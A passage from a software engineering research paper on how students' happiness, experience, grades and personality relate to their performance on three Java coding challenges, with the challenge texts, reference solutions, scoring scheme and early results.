by Gregor (2006) which we present in the next section. Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 2/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 Research objectives and contributions The objective of our research is to construct a theory on how individual characteristics of a software engineer predict his or her performance in solving coding challenges. We contribute the following main results: • We found significant negative correlations between the affective state of sadness and the performance in solving coding challenges, as well as between the personality trait of conscientiousness and the performance. • Significant positive correlations were found between variables related to the academic performance and the coding challenge performance, as well as between programming experience and performance. • These findings were brought together in a Type III theory for predicting (Gregor, 2006). Statistically significant results were achieved to offer a theory grounded in data and we offer the theory for testing by future studies. In the following section we provide a summary of related work on coding challenges and describe the scientific basis of our theory construction. In the ‘Methods’ section we describe the research methodology in detail, including the design of our study, its sample, used coding challenges, candidates for predictor variables and the analysis procedure. Findings of our study are presented in the ‘Results’ section, followed by a discussion of the findings, limitations and implications of our study. BACKGROUND A coding challenge (also called programming challenge) is an algorithm and coding problem used to assess a programmer’s problem-solving skills. Coding challenges are used in several areas of applications and websites exist that offer different types of coding challenges for learning, practicing, and competing with other users. In most cases, one has to find the most efficient algorithm or any correct algorithm within a limited amount of time. These are the coding challenges relevant to our work. Other types of coding challenges include those that can be solved by completing code to win a game or by writing code that passes all given test cases. Programming competitions, for example, use coding challenges as tasks for the participants. Such competitions enjoy wide popularity. In 2017, the ACM International Collegiate Programming Contest (ICPC) recorded 46,381 students from 2,948 universities in 103 countries (Baylor University, 2017). In the same year, the winner of the Google Code Jam prevailed against more than 25,000 competitors and won a grand prize of $15,000 (Google Inc., 2017). It is worth noting that Bloomfield & Sotomayor (2016) found most students were not even motivated by the prizes when participating in the ICPC. They understood that participating in programming contests requires skills which are valuable for job interviews where technical questions are asked. Research, on the one hand, focuses on the design and scoring of coding challenges in programming competitions. We elaborate on these aspects in the ‘Methods’ section where we describe the selection of coding challenges selected for our study and how we Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 3/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 scored the solutions. On the other hand, existing research includes the usage of coding challenges for educational purposes such as the automated grading of assignments and teaching algorithms. For example, Urness (2017) presented the hypothesis that interview question assignments would be beneficial for students because they require intense practice and are more motivating for the students due to their real-world applicability. In a course on data structures, Urness (2017) compared the exam performance of students who were taught with long-term programming assignments with that of students who had to solve short-term interview-question assignments throughout the semester. Urness (2017) found that students enrolled in the interview question assignment section had a slightly better average score in the final exam and that the interview question assignments were motivating for students. Technical interviews in particular have not been investigated thoroughly in scientific literature yet. We identified only two recent relevant papers. Ford et al. (2017) investigated whether there are company differences in interview criteria and how interviewers interpret criteria for software engineer job candidates. Their research was motivated by an existing mismatch of candidates’ expectations of what interviewers assess and what they actually look for in a candidate, which consequently results in lost job opportunities. Coding challenges from Cracking the Coding Interview (McDowell, 2015) were used as interview questions in mock technical interviews with university students and interviewers from nine different software companies. To evaluate a candidate’s performance, interviewers had to fill out an evaluation form for each candidate which included six criteria and an open response section. After the interviews the authors analyzed the evaluation forms to answer the research questions. First, they found consistent interviewers’ expectations for candidates among most companies. Second, interviewers care about technical soundness but place an emphasis on interpersonal skills and effective communication. This finding is consistent with the results of previous studies on the demand for soft skills in software engineering. For example, Matturro (2013) found that about 70% of job advertisements had at least one soft skill listed as a requirement. Teamwork and communication skills but also analytical problem-solving skills were some of the most demanded skills. The interviewers in Ford et al. (2017)’s study noted that candidates had difficulties in communicating their knowledge. However, there is research on how to bridge the gap between what universities teach and what industry demands in terms of interpersonal and communication skills (e.g., Teles & De Oliveira, 2003). Potentially excessive stress and cognitive load due to technical interviews in which candidates have to solve tasks on a whiteboard reinforce bias in hiring practices. For this reason, Behroozi et al. (2018) conducted a study on the differences in stress and cognitive load between solving programming tasks on paper versus on a whiteboard. To assess the difference they used eye measures, measured by a head-mounted eye-tracker and computer vision algorithms. Each of the eleven participants completed tasks under each of the two conditions (paper and whiteboard). The authors then conducted debriefing interviews and analyzed the eye tracking data. Preliminary results suggest that problem-solving on the whiteboard results in higher cognitive load compared to solving programming problems Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 4/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 on paper. In addition, participants rated the whiteboard interview as more stressful. Only in the whiteboard setting nervous tics displayed by participants were observed. Without closer reference to technical interviews, attempts were made to predict how good a developer will perform in a specific environment, based on characteristics that we examine in part in our study. For example, Borreguero et al. (2015) developed an index to find virtuous developers, which is based on the activities and contributions of the respective developers in open-source communities. The authors discuss similar work that aims, for example, at finding experts in such communities. Although this is not about experts for solving coding challenges, at least we wanted to mention these related approaches in our work. Further research is needed to evaluate the approach by Borreguero et al. (2015) and to be able to compare our results with theirs on which individual characteristics best predict a developer’s performance in the respective environments. Theory construction and representation To give a definition of what information systems researchers mean when they deal with theory, Gregor (2006) proposed a taxonomy of five theory types in information systems research. Each theory type has its own definition and consists of a set of structural components: means of representation, constructs, relationships, scope, causal explanations, testable propositions, and prescriptive statements. The theory for predicting, called Type III, ‘‘states what will happen in the future if certain preconditions hold’’ and ‘‘has testable propositions but does not have well-developed justificatory causal explanations’’ (Gregor, 2006: 619–620). We constructed a theory for predicting the influence of individual characteristics on the performance in solving coding challenges. With respect to the taxonomy and the relevant components for Type III theories, we ensured to conduct and describe our study accordingly. METHODS To answer the research question and consequentially develop the above-mentioned theory for predicting, we conducted an exploratory quantitative study in which participants had to solve three coding challenges on a computer and fill out questionnaires about their individual characteristics. Exploratory research intends to gain information for further research through exploring a research question. ‘‘Exploratory research cannot provide a conclusive answer to research problems [...], but they can provide significant insights to a given situation’’ (Singh, 2007: 64). Research design To motivate potential participants to take part in the study, they were told that the study would last at most 90 min and that it was about coding challenges, similar to those used by several software and technology companies during their interview process. They were also told that the reason for the study is to find out why some software engineers perform better in coding challenges than others. Per slot, one or two participants then were invited to a quiet room where they were provided with an informed consent form and introduced verbally to the study. We used the same set of instructions to make sure that every Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 5/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 Coding challengesQuestionnaires HappinessIntroduction and informed consent “... 90 minutes ... about coding challenges ...” Invite participants with broad description “Pairs of Integers” 15 min. Personality Academic performance Experience “Mansion” 25 min. “Triple Jump” 25 min. /** Task description */ public static int method() { // TODO } Figure 1 Schematic representation of the research design. Four questionnaires on the individual char- acteristics had to be completed alternating with solving three coding challenges. Full-size DOI: 10.7717/peerjcs.173/fig-1 participant received the same information. A translated English version of our participation instructions is provided in the paper supplements. After the introduction, participants had the chance to ask questions before they started to fill out the first questionnaire. A schematic representation of the research design is provided in Fig. 1. Participants had to solve coding challenges implemented with Java on a computer without the use of the Internet or other resources. To make sure that there was no advantage or disadvantage for any participant due to not knowing the used development environment, participants were asked if they were familiar with Eclipse and Java. Each coding challenge had to be solved individually and within a given time. There was a given method signature so that the type of the return value as well as the parameters of this method were defined. It was not allowed to change the method signature in any way. A description of the problem was provided as a comment above the method. We will describe the challenges in greater detail below. The task then was to implement the method with a time-efficient solution to the problem. It was allowed to add private methods if needed and to use methods and data structures of the predefined Java packages. Participants were told that the solutions would be evaluated by correctness and time complexity, which are common judgment criteria for technical interviews (McDowell, 2015). While solving a coding challenge, participants were allowed to take notes on paper. In addition to the given method signature for each challenge, there was also a main method with an example call of the method to be implemented. The expected output was provided as well. We provided the example to make it easier for the participants to understand the task and to increase the likelihood that no further questions were necessary while a participant solved a coding challenge. The participants were allowed to run the main method and to modify it to add their own test cases if desired. There was no other feedback on the correctness or efficiency of a participant’s solution than what the main method tested. Participants were told that there was no advantage in submitting a solution before the time was up. If a candidate implemented multiple solutions within the time limit, he or she had to decide which one to submit in the end. When evaluating the solutions Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 6/38 https://peerj.com https://doi.org/10.7717/peerjcs.173/fig-1 http://dx.doi.org/10.7717/peerj-cs.173 afterwards we only considered the implementation provided in the prescribed method signature. We report our evaluation steps in the ‘Analysis procedure’ section. Participants All participants of the study were software engineering students of the University of Stuttgart and they had to be at least at the end of the second semester of their bachelor program. The reason for the latter requirement was that at this point a student has the fundamental knowledge of data structures, algorithms, and time complexity that was required for solving the coding challenges in a time-efficient way. In their second semester, software engineering students attend a lecture which is specifically about data structures and algorithms. The sample consisted of 14 bachelor students at the end of their second semester, seven students who were at least at the end of their fourth bachelor semester and eleven students who studied in the master’s program. These students were personally invited by email. In total, 32 participants took part in our study. Five identified as female and 27 as male. The average age of the participants was 21.88 years with a standard deviation of 2.4. Although limited geographically and culturally, the sample was rich as participants covered the whole spectrum of academic levels. Furthermore, they represent potential participants of technical interviews, that is, fresh BSc and MSc graduates in computer science and software engineering. Coding challenges The criteria for a good task vary depending on the context, target group and what the reasons are for conducting or attempting a coding challenge. For example, an interviewer wants to test a candidate’s ability to develop an algorithm, whereas a teacher of a programming course might want to teach time and space complexity. Coding challenges will be selected accordingly. From what we know from the opinions and experiences of interviewers, we can argue that the existence of the following characteristics of a coding challenge has proven its worth in technical interviews (McDowell, 2013; McDowell, 2017): A brute-force solution which describes an algorithm that systematically goes through all possible solutions to a given problem should not be the most efficient solution to the problem. The reason is that brute-force algorithms usually are the most obvious way of solving a coding challenge and so they are the first solutions that even a below-average coding challenge solver can come up with. If one reason for developing a coding challenge is to find out if a candidate can think critically about his or her initial solution and how this solution can be optimized, then coding challenges with an inefficient brute-force solution and ways to improve it are most suitable. Again, for interviewers it is important to see the logical thinking process and how the candidate approaches an unknown problem (McDowell, 2013). Also, a coding challenge should therefore not just test a single piece of knowledge, for example, a particular programming language feature, except this is what the interviewer aims for. There would be a high chance that some otherwise good coding challenge solvers do not know about this single fact and thus the results become unreliable. More generally, McDowell (2015) recommends interviewers to ‘‘use hard questions, not hard knowledge’’ to focus on problem-solving and other skills that cannot be learned quickly at work. Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 7/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 Recommendations from researchers in the field of creating tasks for programming competitions are similar to the characteristics of good coding challenges for technical interviews. For example, Burton & Hiron (2008) identified short and easy-to-understand problem descriptions as one criterion for a good task on the International Olympiad in Informatics. Another is the existence of several solutions of varying difficulty and efficiency. Different from technical interviews, programming competition tasks also consider, for example, that tasks should be fun and allow participants to have learning experiences (Dagiene & Futschek, 2008). We followed the recommendations of the interviewers and researchers mentioned above and designed our study in a way that a participant only had to interact with his or her computer and that there should be no need for asking for further clarification. This is different from some technical interviews where the challenge description does not provide enough information to find a satisfactory solution and the candidate is expected to ask further questions before attempting to solve the coding challenge. In our study, we only measure the combination of finding and implementing an algorithm to a given coding challenge, and neither explicitly observe how well participants are at understanding problem statements nor how much a participant cares about requirements engineering. Thus, in addition to the characteristics described above, for our study a good coding challenge was not only easily understandable but also unambiguous. We also chose challenges where finding an efficient solution was challenging but the implementation should have been straightforward, because we could not expect every candidate to be familiar with the particularities of the programming language. To avoid making the participants spend too much time on handling edge cases, some limitations to the input parameters were provided in the task description. The set of coding challenges we chose covers a range of concepts which are commonly required for solving coding challenges. This includes the use of appropriate data structures, an optimization problem, and recursive thinking. In the following we describe each of the three coding challenges. They were presented to the participants in German, which is their native language, to minimize misunderstandings. The time limit given for each challenge was for understanding the task, finding an algorithm, and implementing the algorithm. We piloted the study with a male student in a higher bachelor semester to make sure that the time limit for each challenge was sufficient for the participant to come up with a solution. The test participant was able to solve the first two challenges correctly with some time pressure for the first challenge and no time pressure for the second one. In addition, after the pilot test we showed the candidate possible solutions for the third task and it took only a short time until he understood the proposed solutions. This strengthened our assumption that the tasks can be solved and that they can be solved within the given time. Additionally, after each challenge we assessed whether the participants felt that they were under time pressure. We report all assessed variables in section ‘Conceptual model’. Challenge 1—Pairs of Integers (15 min) The first coding challenge, in Listing 1, was considered to be the easiest one, at least when it comes to finding any correct solution to the problem. A brute-force algorithm where Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 8/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 every possible combination of two numbers is tested in two for-loops is straightforward and runs in O(n2), where n is the size of the integer array. Another conceivable solution with a time complexity of O(n·log(n)) sorts first and then applies a binary search to find matching pairs. Furthermore, by using an appropriate data structure one can come up with a solution that runs in O(n). Such a solution is given in Listing 2. Challenge 2—Mansion (25 min) The second challenge was taken from the Australian Informatics Olympiad 2007 and is presented in Listing 3. In the main method there was a detailed example given including an ASCII art that illustrated the scenario, similar to the example and illustration given in the task description of the AIO task (http://archive.is/E5qEG). One approach of solving this coding challenge is to use a sliding window of length w that covers w houses and is shifted along all the houses in the array. The sum of people living in these w houses is the amount of people living opposite the mansion. Each time when shifting the window, one can either calculate the sum of all houses covered by the window or simply use the last sum and subtract the people from the one house that is no longer covered by the window and adding the number of people of the one house that is now covered by the window. The first solution runs in O(n·w) and the second solution runs in O(n), where n is the number of houses. This problem involves considerable problem translation, as it is a rather abstract task. We wanted to ensure that different common types of coding challenges were represented in our study and this task is a type of challenge that appears in technical interviews (see, e.g., McDowell (2015)). To prevent comprehension problems, the problem descriptions were presented to the participants in their mother tongue. During the experiment, the first author of this submission was present in the room to answer any questions that arose. Of the 32 participants, only one person asked for clarification of the mansion task. We have seen no indication that misunderstandings arose. Challenge 3—Triple step (25 min) The third coding challenge is also the hardest one in our study. It is described in the book Cracking the Coding Interview (McDowell, 2015) and the ability of recursive thinking is beneficial to find an approach to solving this problem. The challenge itself is provided in Listing 5. A simple recursive solution with a time complexity of roughly O(3n) is in Listing 6. An alternative implementation would be a recursive depth-first search for all possible permutations starting from the bottom of the staircase. In either case the time complexity is not ideal as the same subtrees have to be calculated multiple times. For example, in the recursive solution in Listing 6 for n=4 the algorithm calculates the solution for countWays(2) twice. One could store the solutions to such a subproblem in an additional memory structure. This reduces the time complexity to O(n). As we told the participants that each solution is only evaluated by correctness and time complexity, we ignore the differences in space complexity. However, with the iterative solution in Listing 7 one can avoid the need for additional memory and get to a solution with a time complexity of O(n) as well. Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 9/38 https://peerj.com http://archive.is/E5qEG http://dx.doi.org/10.7717/peerj-cs.173 /** * In the given array, find the number of integer pairs with a given * difference. * * An example is given in the main method. * * The following applies: * numbers contains at least two integers * numbers contains no duplicates * dif >= 1 */ public static int pairCount(int[] numbers, int dif) { // TODO return 0; } public static void main(String[] args) { int[] numbers = {1,5,3,6,8}; int dif = 2; // Expected output: 3 // The pairs with a difference of two are: {1,3} {5,3} {6,8}. System.out.println(pairCount(numbers, dif)); } Listing 1: Coding challenge 1 public static int pairCount(int[] numbers, int dif) { HashSet<Integer> set = new HashSet<Integer>(); int count = 0; for (int i: numbers) { if (set.contains(i + dif)) { count++; } if (set.contains(i - dif)) { count++; } set.add(i); } return count; } Listing 2: A solution to coding challenge 1 in O(n) /** * You want to build a mansion along a road. On the other side of the street * there are houses, in which a certain number of people live. * * Your mansion is as long as w houses together. * * Place your mansion in such a way that on the other side of the street as * many people as possible live opposite your mansion. * This greatest possible number should be returned by this method. * * An example is given in the main method. * * The following applies: * 1 <= w <= houses.length <= 100000 * The number of people in each house is >= 0 */ public static int mansion(int[] houses, int w) { // TODO return 0; } Listing 3: Coding challenge 2 Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 10/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 public static int mansion(int[] houses, int w) { int count = 0; for (int i=0; i < w; i++) { count += houses[i]; } int lastWindow = count; for (int i=1; i + w <= houses.length; i++) { int currentWindow = lastWindow - houses[i-1] + houses[i-1 + w]; if (currentWindow > count) { count = currentWindow; } lastWindow = currentWindow; } return count; } Listing 4: A solution to coding challenge 2 in O(n) /** * A child is climbing up a staircase with n steps, and can hop either * 1 step, 2 steps, or 3 steps at a time. Implement a method to count how * many possible ways the child can jump up the stairs. * * An example is given in the main method. * * The following applies: * 0 <= n <= 30 * if n=0 return 1 */ public static int countWays(int n) { // TODO return 0; } public static void main(String[] args) { int n=3; // Expected output: 4 // These are the possibilities to climb the three stairs: // {1,1,1}, {1,2}, {2,1}, {3} System.out.println(countWays(n)); } Listing 5: Coding challenge 3 public static int countWays(int n) { if (n<0) { return 0; } else if (n == 0 || n == 1) { return 1; } else { return countWays(n - 1) + countWays(n - 2) + countWays(n - 3); } } Listing 6: A recursive solution to coding challenge 3 in O(3n) public static int countWays(int n) { int result = 1; int a=1; int b=0; int c=0; for (int i=0; i < n; i++) { result = a + b + c; c = b; Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 11/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 2As opposed to Aristotelian eudaimonia which is the realization of conducting a satisfactory life full of quality (Haybron, 2005). b = a; a = result; } return result; } Listing 7: An iterative solution to coding challenge 3 in O(n) Conceptual model Based on existing literature, we created a conceptual model to aid our quantitative exploration. We included four constructs related to individuals that are potentially linked to coding challenge performance, namely happiness, experience, academic performance, and personality. We describe each of them in the following, justify their inclusion in our study with relevant literature and describe how we operationalized and measured. The measure of the coding challenge performance is described in the ‘Analysis procedure’ section. We provide our conceptual model, variables, and operationalization in Fig. 2. The following subsections describe the candidate constructs as well as a rationale for their inclusion. Happiness Before explaining the inclusion of happiness, we need to define it together with the related concept of affect. Under a hedonistic view,2 happiness is a sequence of experiential episodes (Haybron, 2001) and individuals are happy when they experience ‘‘an excess of positive over negative affect’’ (Bradburn, 1969: 9). Affect, in turn, has been defined by Russell (2003) as ‘‘a neurophysiological state that is consciously accessible as a simple, nonreflective feeling that is an integral blend of hedonic (pleasure–displeasure) and arousal (sleepy–activated) values’’ (p. 147). Affect, in other words, is the basic building block of emotions and moods. We consider it a sensible choice to have happiness as a candidate predictor for coding challenge performance: happiness and affect in general have been found to positively impact job performance (e.g., Oswald, Proto & Sgroi (2015)) and analytic problem-solving (e.g., Graziotin, Wang & Abrahamsson (2014)). We have published extensively on the relationship between happiness and software developers’ performance while programming (e.g., Graziotin et al. (2018); Graziotin, Wang & Abrahamsson (2015), the latter being a theory of affect and performance while programming). In our studies, we found support for the happy, therefore productive (high-performing) developer. In our studies, when we had the need to quantitatively assess the happiness of developers (Graziotin, Wang & Abrahamsson, 2014; Graziotin et al., 2017), we opted for the Scale of Positive and Negative Experiences (SPANE, Diener et al. (2010)). SPANE converges to other similar measurement instruments and has been psychometrically validated in several large-scale studies (Rahm, Heise & Schuldt, 2017; Diener et al., 2010; Silva & Caetano, 2013; Li, Bai & Wang, 2013; Sumi, 2014; Jovanović, 2015; Corno, Molinari & Baños, 2016; Du Plessis & Guse, 2017) including consistency across full-time workers and students (Silva & Caetano, 2013). SPANE assesses how often a participant has experienced several affective states over the past four weeks. Six positive and six negative states are graded on a 5-point scale of Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 12/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 Personality Operationalized by Agreeableness, Conscientiousness, Extraversion, Neuroticism, Openness Measured using German version of the Big Five Inventory Experience Operationalized by Experience with coding challenges¹, programming², Java² and work². Open source³ and Stack Overflow⁴ contributions Measured using ¹ 6-point frequency scale, ² years, ³ number of pull requests on public profiles, ⁴ reputation Academic performance Operationalized by Current GPA, B.Sc. GPA, Exam gradings for courses on data structures and algorithms and study progress¹ Measured using ¹ study program and number of semesters Happiness Operationalized by SPANE-P/N/B and 12 affective states: positive, negative, good, bad, pleasant, unpleasant, happy, sad, joyful, afraid, contented, angry Measured using Scale of Positive and Negative Experience (SPANE) Coding challenge performance Figure 2 Overview of the candidates for predictor variables, their operationalization and measure- ments. Investigated relationships with the coding challenge performance are represented as dashed lines. Footnotes for operationalizing variables refer to the used measure for this operationalization within the same rounded rectangle. Full-size DOI: 10.7717/peerjcs.173/fig-2 frequency. The positive and negative affective scores can be summed to form the SPANE- P(ositive) and SPANE-N(egative) dimensions, which range from 1 to 30. A subtraction of the SPANE-N from the SPANE-P value results in the affect balance, or SPANE-B (Diener et al., 2010), dimension which can vary from −24 to 24. A value of 0 indicates a balance of frequency of positive and negative affective experiences, and −24 and +24 indicate the negative and positive extremes, respectively. Experience For us, experience is ‘‘knowledge, skill, or practice derived from direct observation of or participation in events or in a particular activity’’ and ‘‘the length of such participation’’(Merriam-Webster (2016), online). In particular, we were interested in the practical programming-related experience of software engineers and its relation to the coding challenge performance. Programming experience is a multi-faceted construct that is usually expressed in years (e.g., Mäntylä et al. (2014)). It is widely accepted that the more experienced software engineers are, the higher their productivity will be (Siegmund et al., 2014) and, more interestingly for the present study, their program comprehension abilities (Siegmund et al., 2014). This is why we included experience in our set of candidates to predict coding challenge performance. We operationalized the construct of experience with frequency of coding challenges over the last year, general, Java-related, and professional programming experience in years, but also reputation on StackOverflow.com. We included the latter because developers rely on it, draw on the knowledge from experts at different levels, and developer expertise Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 13/38 https://peerj.com https://doi.org/10.7717/peerjcs.173/fig-2 http://dx.doi.org/10.7717/peerj-cs.173 3We report some examples here but direct the reader to the work by Cruz, Da Silva & Capretz (2015) for many more references and interesting points. is well represented by good questions and answers on it (Abdalkareem, Shihab & Rilling, 2017; Pal, Harper & Konstan, 2012; Kumar & Pedanekar, 2016). For similar reasons, we also operationalized experience with the number of pull requests on GitHub.com as they are positively correlated to several experience measures (Rahman & Roy, 2014). Academic performance Academic performance, or academic achievement, is ‘‘the extent to which a person has accomplished specific goals that were the focus of activities in instructional environments, specifically in school, college, and university’’ (Steinmayr et al. (2014), online). While it would seem sensible to expect a positive correlation between academic performance and coding challenge performance, the literature did not provide any strong indication on either side. Sackman, Erikson & Grant (1968) neither found a correlation between the performance of experienced programmers and trainee class grades nor between the performance and the score in programming ability tests; however, Darcy & Ma (2005) found that participants with a higher academic performance performed better in their programming task. Building upon a non-established truth on academic performance, we included academic performance as a candidate for predictors to coding challenge performance, and we operationalized the construct with the students’ GPA score and exam grades for two courses on data structures, algorithms and complexity. The first course is called data structures and algorithms and students usually take it in their second bachelor semester. The second course is called algorithms and complexity and students usually take it at a later stage of their bachelor studies. The latter course covers algorithm complexity in more detail while the first course gives a practical introduction to the usage of data structures and algorithms for common problems. The two courses have different examiners. We also asked for the current semester in which the students are enrolled at as a way to assess the seniority of the participants. Personality Software engineering research on personality and individual performance can now be considered to be established, mature, yet still relevant and increasing (Cruz, Da Silva & Capretz, 2015). No prior research investigated coding challenges and personalities. However, an older study by Evans & Simkin (1989) found that a personality trait was a statistically significant explanatory factor for mastering computer concepts. Once again, we had to inspect related work on more generic performance. In their systematic mapping study on personality research in software engineering, Cruz, Da Silva & Capretz (2015) found conflicting evidence on the influence of personality and various conceptualizations of performance of developers.3 There have been reports of personality being a successful indicator of academic performance (Layman, 2007) as well as not being a significant factor predicting academic performance (Golding, Facey-Shaw & Tennant, 2006). Some research conflict was found about individual performance of programmers. Positive relationships between personality traits and programming task performance Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 14/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 (Shoaib, Nadeem & Akbar, 2009; Karimi et al., 2016) have been found together with no significant relationship between personality and programming performance (Bell et al., 2009). We see a mild indication that personality has an influence on individual performance while developing software and, in the absence of a strong trend, we include the construct in our conceptual model in the hope to shed some more light on the matter. Even though the Myers–Briggs Type Indicator (MBTI) is still the dominant framework for understanding and assessing personality in software engineering research, we are aware of its poor psychometric characteristics (Pittenger, 1993) and that the Five Factor Model (Digman, 1990; McCrae & John, 1992) is a validated and better choice (McCrae & Costa, 1989). The Five Factor model assesses personality along five dimensions, i.e., The Big Five, i.e., extraversion, agreeableness, conscientiousness, neuroticism and openness to experience. The participants’ personality was assessed with a validated German version of the Big Five Inventory (Lang, Lüdtke & Asendorpf, 2001). In addition to the mentioned variables, we also kept track of time pressure as a potential confounding factor. After each coding challenge we asked participants on a 5-point agreement scale if they agree that they were under time pressure when solving this coding challenge. Analysis procedure We first report how we assessed solutions to the coding challenges to obtain an overall performance score. Then we describe how we analyzed the data to answer the research question. Assessing the coding challenge solutions The way solutions to coding challenges are evaluated in interviews and programming contests varies, but in the latter there seem to be more objective and absolute judgment criteria than in technical job interviews. It is common for solutions to be evaluated for correctness in programming competitions, and for this purpose there are a couple of test cases for each coding challenge. However, different evaluation schemes have been proposed that differ in the way of assessing solutions which pass some test cases (Kemkes, Vasiga & Cormack, 2006). For example, the ACM ICPC only differentiates between a correct and an incorrect solution. If any test case fails, then a solution receives no points. The more problems a team solves, the higher it is ranked and in case of a tie, the time needed to solve the problems is the decisive criterion (Bloomfield & Sotomayor, 2016). The Google Code Jam works in a similar way, except that each time a participant submits an incorrect solution he or she receives an additional time penalty. In case of a tie, the participant with the lowest penalty time will be ranked first. Other scoring schemes award points for each successful test case. Kemkes, Vasiga & Cormack (2006) proposed to award full score for each batch of tests if the solution produces a correct output for any test case in that batch. In addition to judging the correctness of a solution, some contests also have a time limit in which a solution has to produce a correct output for a given test case (Bloomfield & Sotomayor, 2016). This forces participants of a programming competition not only to find a correct algorithm but also to find an efficient one. Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 15/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 Table 1 Scoring scheme. Mapping from a solution’s time complexity class to score. Challenge 1 Challenge 2 Challenge 3 Complexity Score Complexity Score Complexity Score O(n) 1.0 O(n) 1.0 O(n) 2.0 O(n·log(n)) 0.66 O(n·w) 0.5 O(3n) 1.0 O(n2) 0.33 To assess a participant’s performance we imitated how recruiters evaluate the performance of candidates in technical job interviews, that is in relation to each other and with respect to correctness and time complexity (McDowell, 2015). The latter aspect was told the participants before the start of study. Although it would have been possible to determine the best possible time complexity class of an algorithm to the given problems, we could not be sure that this solution could be achieved under the conditions of our study. It was therefore essential to assess the participants’ solutions in relation to each other. Additionally, we made use of the All-or-Nothing scoring (Kemkes, Vasiga & Cormack, 2006) principle known from several programming competitions. For a participant’s solution to a single coding challenge we first run automated test cases on the given source code to see if it produced correct results. If any test case failed, the solution was considered to be incorrect and given zero points. If the solution passed all test cases we analyzed its time complexity. A concrete scoring scheme based on our results is provided in Table 1. Solutions in the best given time complexity class, which, in our scenario, were the solutions with the most efficient algorithm for the problem, were given one point. In case participants came up with more than one correct algorithm in different complexity classes, the solutions were ranked and evaluated on a linear scale between zero and one. This means, for example, that for two correct solutions in different time complexity classes the second best solution receives a score of 0.5, whereas for three correct solutions in different time complexity classes the second best receives a score of 0.66 and the third best solution receives a score of 0.33. As the third coding challenge was expected to be the hardest one, we multiplied the achieved score for the third coding challenge by a factor of 2.0. The overall performance score of a participant was obtained by summing up the scores for each of the three coding challenges. The maximum score achievable was 4.0. Data analysis To answer the research question, we calculated several correlation coefficients between a participant’s coding challenge performance score and the quantitative answers to the questionnaire items which operationalized the candidates for predictor variables provided in Fig. 2. We used correlation coefficient calculations which range from−1 to+1 to explore which individual characteristics were related to the performance in solving coding challenges. We are aware of an open debate (Murray, 2013) on whether Likert scales represent ordinal or continuous intervals. While the debate still does not have clear indications, we opted to consider all our scales to be continuous in nature and Likert items are discrete values on a continuous scale. Therefore, we use Pearson’s correlation coefficient where its assumptions Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 16/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 are met, and Spearman’s rank correlation coefficient otherwise. We met the latter case for affective states, work experience, experience with coding challenges and the study progress. We report all calculated correlation coefficients with emphasis on moderate and strong relationships in the following section. The anonymized raw data for this study is available in the Supplements of the present paper. RESULTS We characterize our participants in the ‘Methods’ section. We refer to them in this section using a post-experiment anonymous identifier in the form of Px, where x ranges from 1 to 32. The identifier also represents the ranking of the participants, where 1 implies the highest coding challenge performance score. We first want to report on the performance of each participant to provide a clear overview of the frequency of time complexity classes for correct solutions and how the overall score for each participant is achieved. Table 1 shows the concrete scoring scheme and Table 2 shows the resulting scores for the participants and illustrates the effect of our scoring scheme. Due to the multiplication factor of 2.0 for the third coding challenge, the weakest solution to the third coding challenge receives the same score as the best solution to the easier coding challenges. However, the ranking order of the participants would not look much different with equal factors of 1.0 for all three coding challenges. P06 would have the same score as P07 to P11. P02 would be ranked after P05 and before P06. The average participant had 1.72 correct solutions and a score of 1.04 out of a maximum score of 4.0. Eleven participants scored the median and mode value of 0.83. Only one participant achieved the highest possible score and four participants solved none of the challenges correctly and thus had a score of 0. From Table 2 we see that 28 participants came up with a solution to the first coding challenge but only two participants were able to implement something different from the brute-force algorithm. For the second challenge, of 20 correct solutions, nine run in linear time, which is the best possible for all challenges. Participant P02 as well as P23 to P28 were close to a solution for the second challenge but they did not implement the termination condition for their loop correctly which resulted in failed test cases. The third coding challenge was solved by six participants. Although the number of correct solutions was the smallest of the three coding challenges and the number of complexity classes to which these solutions belong was not higher than for the other coding challenges, with four different algorithms the diversity of correct solutions was the highest. After each coding challenge, participants had to indicate on a 5-point Likert scale how much they were under time pressure when solving the task they had previously worked on. Accordingly, for the first coding challenge the average time pressure was 2.22 and 1.92 for only those participants who came up with a correct solution. For the second coding challenge the average time pressure was 2.19 and 1.71 for participants with correct solutions. The median value was 2 and the mode was 1 for both coding challenges, which means that participants most often disagreed with the statement that they felt under time pressure. This is different for the third coding challenge for which the average time pressure was 3.84 (median=4.5, mode=5) and 2.67 for the six participants with a correct solution. Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 17/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 Table 2 Performance scores. Individual performance of the participants. Each row contains the time complexity classes of a participant’s correct solution to the corresponding challenge. Incorrect solutions are marked with a dash. Participant Challenge 1 Challenge 2 Challenge 3 